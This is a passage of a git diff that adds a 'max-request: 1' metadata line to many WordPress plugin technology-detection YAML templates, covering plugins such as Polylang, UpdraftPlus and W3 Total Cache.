diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
